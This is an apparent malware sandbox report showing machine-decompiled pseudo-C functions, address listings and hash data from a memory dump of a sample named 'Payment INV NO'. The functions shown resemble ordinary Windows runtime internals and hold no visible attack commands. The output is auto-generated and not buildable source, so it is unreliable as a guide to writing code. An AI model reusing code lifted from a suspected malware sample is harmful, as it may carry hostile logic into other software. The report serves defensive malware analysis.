						 *((intOrPtr*)(_t73 - 0x20)) = _t62;
						goto L16;
					}
					L5:
					_t70 = _t70 - 1;
					 *(_t73 - 0x24) = _t70;
				}
				goto L6;
			}

















                                                          0x017a0100
                                                          0x017a0102
                                                          0x017a0107
                                                          0x017a010c
                                                          0x017a010e
                                                          0x017a0115
                                                          0x017f6127
                                                          0x017a016a
                                                          0x017a016f
                                                          0x017a016f
                                                          0x017a0120
                                                          0x017a0125
                                                          0x017a0129
                                                          0x017a0131
                                                          0x017f612e
                                                          0x017f6134
                                                          0x017f6134
                                                          0x017a015c
                                                          0x017a015c
                                                          0x017a0163
                                                          0x017a0168
                                                          0x00000000
                                                          0x017a0168
                                                          0x017a0137
                                                          0x017a0139
                                                          0x017a013c
                                                          0x017a0141
                                                          0x017a0144
                                                          0x017a014a
                                                          0x017a0154
                                                          0x017a0172
                                                          0x017a0175
                                                          0x017a0177
                                                          0x017a017a
                                                          0x017a017a
                                                          0x017a017d
                                                          0x017a0180
                                                          0x017a0184
                                                          0x017a020b
                                                          0x017a020b
                                                          0x017a01db
                                                          0x017a01dd
                                                          0x017a0210
                                                          0x017a0213
                                                          0x017a0213
                                                          0x017a01df
                                                          0x017a01e2
                                                          0x017a01e8
                                                          0x017f6171
                                                          0x017f6176
                                                          0x017f6178
                                                          0x017f617b
                                                          0x017f6180
                                                          0x017f6194
                                                          0x017f6194
                                                          0x017f6197
                                                          0x017a0201
                                                          0x017a0201
                                                          0x017a0203
                                                          0x00000000
                                                          0x017a0203
                                                          0x017a01ee
                                                          0x017a01f3
                                                          0x017a01f8
                                                          0x017f61b2
                                                          0x017f61b7
                                                          0x017f61bc
                                                          0x017f6188
                                                          0x017f618d
                                                          0x00000000
                                                          0x017f618d
                                                          0x017f6132
                                                          0x00000000
                                                          0x017f6132
                                                          0x017a01fe
                                                          0x00000000
                                                          0x017a01fe
                                                          0x017a018a
                                                          0x017a0191
                                                          0x017f613f
                                                          0x00000000
                                                          0x00000000
                                                          0x017f6145
                                                          0x017a019a
                                                          0x00000000
                                                          0x00000000
                                                          0x017a019f
                                                          0x017a01a7
                                                          0x017f614a
                                                          0x017f6152
                                                          0x017f6155
                                                          0x017f615a
                                                          0x017f615d
                                                          0x017a01ad
                                                          0x017a01ad
                                                          0x017a01af
                                                          0x017a01af
                                                          0x017a01b8
                                                          0x017a01ba
                                                          0x017a01bd
                                                          0x017a01c2
                                                          0x017a01c2
                                                          0x017a01c9
                                                          0x017a01cc
                                                          0x017a01d2
                                                          0x017a01d8
                                                          0x00000000
                                                          0x017a01d8
                                                          0x017a0156
                                                          0x017a0156
                                                          0x017a0157
                                                          0x017a0157
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d4185bf9adb91b2486a0ef9e00eb052101285fdb6b0b0ed4318f6694248198ee
                                                          • Instruction ID: 73a9d9643ee6f7ceb7ed2256ec4482a104c22147e83f03fffeca4aac147a208d
                                                          • Opcode Fuzzy Hash: d4185bf9adb91b2486a0ef9e00eb052101285fdb6b0b0ed4318f6694248198ee
                                                          • Instruction Fuzzy Hash: 7541B931945205CFDF21DF68CA807EEBBB0BF58314F540659E511AB396E335AA80CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017C1520 Relevance: .1, Instructions: 115COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 76%
                                                          			E017C1520(signed int* _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int* _v16;
				signed int _v20;
				short _v46;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t40;
				intOrPtr _t44;
				signed int _t50;
				signed int _t51;
				intOrPtr _t52;
				signed int _t55;
				void* _t63;
				signed int _t64;
				signed int _t69;
				signed int _t70;
				signed int _t72;
				void* _t74;
				signed int _t75;
				signed int* _t78;
				void* _t79;
				signed int _t80;

				_t82 = (_t80 & 0xfffffff8) - 0x34;
				_v8 =  *0x188d360 ^ (_t80 & 0xfffffff8) - 0x00000034;
				_t72 = _a12;
				_t78 = _a4;
				if((_t72 & 0xe0000000) != 0 || (_t72 & 0x11000000) == 0x11000000) {
					_t40 = 0xc00000f1;
					goto L3;
				} else {
					_t69 = _a8;
					__eflags = _t69 & 0xff000000;
					if((_t69 & 0xff000000) != 0) {
						_t40 = 0xc00000f0;
						L3:
						_pop(_t74);
						_pop(_t79);
						_pop(_t63);
						return E017DB640(_t40, _t63, _v8 ^ _t82, _t72, _t74, _t79);
					}
					__eflags = _t72 & 0x04000000;
					if((_t72 & 0x04000000) != 0) {
						L17:
						_t40 = 0;
						goto L3;
					}
					_t44 =  *[fs:0x30];
					_t64 = 0;
					_t78[1] = _t78[1] | 0xffffffff;
					_t78[2] = 0;
					_t78[3] = 0;
					_t78[4] = 0;
					__eflags =  *((intOrPtr*)(_t44 + 0x64)) - 1;
					if( *((intOrPtr*)(_t44 + 0x64)) <= 1) {
						_t78[5] = 0;
						_t70 = 0;
						L11:
						_t78[5] = _t72 & 0x09000000 | _t70;
						__eflags = _t72 & 0x10000000;
						if((_t72 & 0x10000000) != 0) {
							L19:
							_t64 = 1;
							L13:
							 *_t78 =  *_t78 | 0xffffffff;
							__eflags = _t64;
							if(__eflags != 0) {
								E017C1624(_t64, __eflags);
								__eflags =  *_t78 - 0xffffffff;
								if( *_t78 != 0xffffffff) {
									goto L14;
								}
								_t78[5] = _t78[5] | 0x01000000;
							}
							L14:
							_t75 = 0x7ffe0382;
							_t50 =  *( *[fs:0x30] + 0x50);
							__eflags = _t50;
							if(_t50 != 0) {
								__eflags =  *_t50;
								if( *_t50 == 0) {
									goto L15;
								}
								_t51 =  *( *[fs:0x30] + 0x50) + 0x228;
								L16:
								__eflags =  *_t51;
								if( *_t51 != 0) {
									_t52 =  *[fs:0x30];
									__eflags =  *(_t52 + 0x240) & 0x00000002;
									if(( *(_t52 + 0x240) & 0x00000002) == 0) {
										goto L17;
									}
									_v16 = _t78;
									_v46 = 0x1723;
									_v20 = _t78[5];
									_t55 = E017B7D50();
									__eflags = _t55;
									if(_t55 != 0) {
										_t75 =  *( *[fs:0x30] + 0x50) + 0x228;
										__eflags = _t75;
									}
									_push( &_v52);
									_push(8);
									_push(0x10402);
									_push( *_t75 & 0x000000ff);
									E017D9AE0();
								}
								goto L17;
							}
							L15:
							_t51 = _t75;
							goto L16;
						}
						__eflags =  *0x1886900 - _t64; // 0x0
						if(__eflags != 0) {
							goto L19;
						}
						goto L13;
					}
					__eflags = _t72 & 0x02000000;
					if((_t72 & 0x02000000) != 0) {
						L18:
						_t70 = 0x20007d0;
						L10:
						_t78[5] = _t70;
						goto L11;
					}
					__eflags = _t69;
					if(_t69 == 0) {
						goto L18;
					}
					_t70 = _t69 & 0x00ffffff;
					__eflags = _t70;
					goto L10;
				}
			}



























                                                          0x017c1528
                                                          0x017c1532
                                                          0x017c1536
                                                          0x017c153b
                                                          0x017c1545
                                                          0x017c1554
                                                          0x00000000
                                                          0x017c156d
                                                          0x017c156d
                                                          0x017c1570
                                                          0x017c1576
                                                          0x017ee2f1
                                                          0x017c1559
                                                          0x017c155d
                                                          0x017c155e
                                                          0x017c155f
                                                          0x017c156a
                                                          0x017c156a
                                                          0x017c157c
                                                          0x017c1582
                                                          0x017c1601
                                                          0x017c1601
                                                          0x00000000
                                                          0x017c1601
                                                          0x017c1584
                                                          0x017c158a
                                                          0x017c158c
                                                          0x017c1590
                                                          0x017c1593
                                                          0x017c1596
                                                          0x017c1599
                                                          0x017c159d
                                                          0x017ee2fb
                                                          0x017ee2fe
                                                          0x017c15b8
                                                          0x017c15c1
                                                          0x017c15c4
                                                          0x017c15ca
                                                          0x017c160f
                                                          0x017c160f
                                                          0x017c15d4
                                                          0x017c15d4
                                                          0x017c15d7
                                                          0x017c15d9
                                                          0x017c1615
                                                          0x017c161a
                                                          0x017c161d
                                                          0x00000000
                                                          0x00000000
                                                          0x017ee305
                                                          0x017ee305
                                                          0x017c15db
                                                          0x017c15e1
                                                          0x017c15eb
                                                          0x017c15ee
                                                          0x017c15f0
                                                          0x017ee311
                                                          0x017ee314
                                                          0x00000000
                                                          0x00000000
                                                          0x017ee323
                                                          0x017c15f8
                                                          0x017c15f8
                                                          0x017c15fb
                                                          0x017ee32a
                                                          0x017ee330
                                                          0x017ee337
                                                          0x00000000
                                                          0x00000000
                                                          0x017ee342
                                                          0x017ee346
                                                          0x017ee34e
                                                          0x017ee352
                                                          0x017ee357
                                                          0x017ee359
                                                          0x017ee364
                                                          0x017ee364
                                                          0x017ee364
                                                          0x017ee36a
                                                          0x017ee36e
                                                          0x017ee370
                                                          0x017ee375
                                                          0x017ee376
                                                          0x017ee376
                                                          0x00000000
                                                          0x017c15fb
                                                          0x017c15f6
                                                          0x017c15f6
                                                          0x00000000
                                                          0x017c15f6
                                                          0x017c15cc
                                                          0x017c15d2
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017c15d2
                                                          0x017c15a3
                                                          0x017c15a9
                                                          0x017c1608
                                                          0x017c1608
                                                          0x017c15b5
                                                          0x017c15b5
                                                          0x00000000
                                                          0x017c15b5
                                                          0x017c15ab
                                                          0x017c15ad
                                                          0x00000000
                                                          0x00000000
                                                          0x017c15af
                                                          0x017c15af
                                                          0x00000000
                                                          0x017c15af

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4c70d8b3f1372286404feaa2b6606973c9e480a1d3b26b1f7a412bfca902597f
                                                          • Instruction ID: 11f5ca48592200338c8db079666b263cfc3d2d0fb2f98cc04eb5161807c53988
                                                          • Opcode Fuzzy Hash: 4c70d8b3f1372286404feaa2b6606973c9e480a1d3b26b1f7a412bfca902597f
                                                          • Instruction Fuzzy Hash: D241DE31609B40CFE725CF2CD59472AF7E5BB48B10F984A7DE8A28B682DB34E440CB41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017A3BF4 Relevance: .1, Instructions: 113COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E017A3BF4(intOrPtr __ecx, signed short __edx, char _a4, short* _a8) {
				signed char _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				char _v21;
				char _v33;
				void* _t29;
				signed int _t30;
				short* _t42;
				signed short _t44;
				short _t48;
				intOrPtr _t54;
				signed short* _t56;
				void* _t58;
				signed char _t62;
				signed int _t63;

				_v21 = 0;
				_v16 = __ecx;
				_t44 = __edx;
				_t58 = 0xc0000034;
				if(__ecx == 0 || __edx == 0) {
					_t29 = 0xc000000d;
					goto L10;
				} else {
					if(__edx == 0x1000) {
						_t29 = 0xc0000034;
						L10:
						return _t29;
					}
					_t54 =  *((intOrPtr*)(__ecx + 0x14));
					_t48 = 0;
					_t30 =  *(_t54 + 6) & 0x0000ffff;
					_v20 = _t30;
					if(_t30 == 0) {
						L12:
						if(E017CF3D5( &_v20, 0xaa, 0) < 0) {
							L22:
							_t58 = 0xc0000017;
							L18:
							_t29 = _t58;
							goto L10;
						}
						if(_v20 == 0) {
							_t62 = 0;
						} else {
							_t62 = E017B4620( &_v20,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20);
						}
						if(_t62 == 0) {
							goto L22;
						} else {
							_v8 = _t62;
							_v12 = 0xaa0000;
							if(_a4 != 0) {
								_v8 = _t62;
								_v12 = 0xaa0000;
								if(E017A3B30(_t44 & 0x0000ffff,  &_v12) != 0) {
									_t58 = E017A37EE(_v16, _v8, 0, _a8);
								}
							}
							E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t62);
							if(_v33 != 0) {
								if(_t58 != 0xc0000034) {
									goto L18;
								}
								_t29 = 0xc00000bb;
								goto L10;
							} else {
								goto L18;
							}
						}
					} else {
						_t56 =  *(_t54 + 0xc);
						do {
							if(_t56[2] != _t44) {
								goto L11;
							}
							_t63 =  *_t56 & 0x0000ffff;
							if((_t63 & 0x00001020) != 0x20) {
								_t30 = _v20;
								if((_t63 & 0x00001000) != 0) {
									_v21 = 1;
								}
								goto L11;
							}
							_t42 = _a8;
							if(_t42 != 0) {
								 *_t42 = _t48;
							}
							_t29 = 0;
							goto L10;
							L11:
							_t48 = _t48 + 1;
							_t56 =  &(_t56[0xe]);
						} while (_t48 < _t30);
						goto L12;
					}
				}
			}



















                                                          0x017a3c02
                                                          0x017a3c07
                                                          0x017a3c10
                                                          0x017a3c15
                                                          0x017a3c19
                                                          0x017f8209
                                                          0x00000000
                                                          0x017a3c28
                                                          0x017a3c30
                                                          0x017f81d2
                                                          0x017a3c70
                                                          0x017a3c76
                                                          0x017a3c76
                                                          0x017a3c36
                                                          0x017a3c39
                                                          0x017a3c3b
                                                          0x017a3c3f
                                                          0x017a3c45
                                                          0x017a3c81
                                                          0x017a3c94
                                                          0x017a3d2d
                                                          0x017a3d2d
                                                          0x017a3cee
                                                          0x017a3cee
                                                          0x00000000
                                                          0x017a3cee
                                                          0x017a3c9f
                                                          0x017a3d29
                                                          0x017a3ca5
                                                          0x017a3cb9
                                                          0x017a3cb9
                                                          0x017a3cbd
                                                          0x00000000
                                                          0x017a3cbf
                                                          0x017a3cc3
                                                          0x017a3cc7
                                                          0x017a3ccf
                                                          0x017a3cf9
                                                          0x017a3d02
                                                          0x017a3d11
                                                          0x017a3d25
                                                          0x017a3d25
                                                          0x017a3d11
                                                          0x017a3cde
                                                          0x017a3ce8
                                                          0x017f81f9
                                                          0x00000000
                                                          0x00000000
                                                          0x017f81ff
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017a3ce8
                                                          0x017a3c47
                                                          0x017a3c47
                                                          0x017a3c4a
                                                          0x017a3c4e
                                                          0x00000000
                                                          0x00000000
                                                          0x017a3c50
                                                          0x017a3c5e
                                                          0x017f81d9
                                                          0x017f81e3
                                                          0x017f81e9
                                                          0x017f81e9
                                                          0x00000000
                                                          0x017f81e3
                                                          0x017a3c64
                                                          0x017a3c69
                                                          0x017a3c6b
                                                          0x017a3c6b
                                                          0x017a3c6e
                                                          0x00000000
                                                          0x017a3c79
                                                          0x017a3c79
                                                          0x017a3c7a
                                                          0x017a3c7d
                                                          0x00000000
                                                          0x017a3c4a
                                                          0x017a3c45

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ba178b27a731bc9cd0bc833dcf15acbf50a5809aa6c6582656777645c23c268c
                                                          • Instruction ID: ab60729ff85578f43bf51ddd7e26ba3e96e90c56b3e122211a23a66790baaca6
                                                          • Opcode Fuzzy Hash: ba178b27a731bc9cd0bc833dcf15acbf50a5809aa6c6582656777645c23c268c
                                                          • Instruction Fuzzy Hash: 4E31C031608342DBE721DF6A8804B67FAD5BBC4791F44462EFA858B2C1D374C884CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017AB433 Relevance: .1, Instructions: 109COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 72%
                                                          			E017AB433(intOrPtr __ecx, signed int __edx, intOrPtr _a4, char _a8) {
				char _v5;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				char _v24;
				void* __ebx;
				short _t48;
				intOrPtr* _t51;
				char* _t52;
				signed int _t61;
				void* _t63;
				signed int _t71;
				intOrPtr _t73;
				void* _t74;

				_t73 = __ecx;
				_v5 = __edx;
				_v12 = __ecx;
				_t65 = __edx;
				_t71 = 1 << __edx;
				if(1 > 0x78000) {
					_t71 = 0x78000;
				}
				_t58 = _t71;
				if(_a8 != 0) {
					_t13 = _t71 + 0x2000; // 0x2001
					_t58 = _t13;
				}
				E017AEEF0( *((intOrPtr*)(_t73 + 0xc8)));
				_t74 = E017B4620(_t65, _t73, 0x800001, _t58);
				if(_t74 == 0) {
					E017AEB70(_t65,  *((intOrPtr*)(_v12 + 0xc8)));
					L8:
					return _t74;
				}
				if(_a8 != 0) {
					_t15 = _t74 + 0xfff; // 0xfff
					_t61 = _t15 + _t71 & 0xfffff000;
					_v20 = _t61;
					_t63 = _t61 - _t74 + 0x1000;
					_t74 = E017B8E10(_v12, 0x800001, _t74, _t63);
					E017AEB70(_t65,  *((intOrPtr*)(_v12 + 0xc8)));
					_v16 = 0x1000;
					_push( &_v24);
					_push(1);
					_push( &_v16);
					_push( &_v20);
					_push(0xffffffff);
					E017D9A00();
					_t58 = _t63 - 0x1000;
					 *((char*)(_t74 + 9)) = 1;
					_t48 = _t63 - 0x1000 - _t71;
					_t72 = _v12;
				} else {
					_t72 = _v12;
					E017AEB70(_t65,  *((intOrPtr*)(_v12 + 0xc8)));
					_t48 = 0;
					 *((char*)(_t74 + 9)) = 0;
				}
				 *((short*)(_t74 + 0xa)) = _t48;
				 *((char*)(_t74 + 8)) = _v5;
				_t51 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t51 != 0) {
					if( *_t51 == 0) {
						goto L6;
					}
					_t52 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					goto L7;
				} else {
					L6:
					_t52 = 0x7ffe0380;
					L7:
					if( *_t52 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							L01851843(_t58, _t72, _t74, _t58, _a4);
						}
					}
					goto L8;
				}
			}

















                                                          0x017ab442
                                                          0x017ab444
                                                          0x017ab448
                                                          0x017ab44b
                                                          0x017ab452
                                                          0x017ab456
                                                          0x017fa7da
                                                          0x017fa7da
                                                          0x017ab460
                                                          0x017ab462
                                                          0x017ab4d2
                                                          0x017ab4d2
                                                          0x017ab4d2
                                                          0x017ab46a
                                                          0x017ab47b
                                                          0x017ab47f
                                                          0x017fa7ea
                                                          0x017ab4c8
                                                          0x017ab4cf
                                                          0x017ab4cf
                                                          0x017ab489
                                                          0x017ab4dd
                                                          0x017ab4e5
                                                          0x017ab4eb
                                                          0x017ab4f0
                                                          0x017ab503
                                                          0x017ab50e
                                                          0x017ab516
                                                          0x017ab51d
                                                          0x017ab51e
                                                          0x017ab523
                                                          0x017ab527
                                                          0x017ab528
                                                          0x017ab52a
                                                          0x017ab52f
                                                          0x017ab535
                                                          0x017ab53b
                                                          0x017ab53d
                                                          0x017ab48b
                                                          0x017ab48b
                                                          0x017ab494
                                                          0x017ab499
                                                          0x017ab49b
                                                          0x017ab49b
                                                          0x017ab49e
                                                          0x017ab4a5
                                                          0x017ab4ae
                                                          0x017ab4b3
                                                          0x017fa7f7
                                                          0x00000000
                                                          0x00000000
                                                          0x017fa806
                                                          0x00000000
                                                          0x017ab4b9
                                                          0x017ab4b9
                                                          0x017ab4b9
                                                          0x017ab4be
                                                          0x017ab4c1
                                                          0x017fa81d
                                                          0x017fa82b
                                                          0x017fa82b
                                                          0x017fa81d
                                                          0x00000000
                                                          0x017ab4c1

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
